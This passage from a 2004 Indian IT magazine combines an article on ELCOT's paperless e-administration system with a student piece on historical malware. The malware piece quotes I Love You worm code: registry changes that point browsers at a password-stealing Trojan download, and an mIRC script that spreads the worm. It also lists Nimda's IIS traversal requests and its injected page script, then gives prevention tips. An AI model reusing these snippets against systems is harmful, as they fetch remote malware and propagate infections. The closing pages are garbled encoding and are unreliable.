A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn 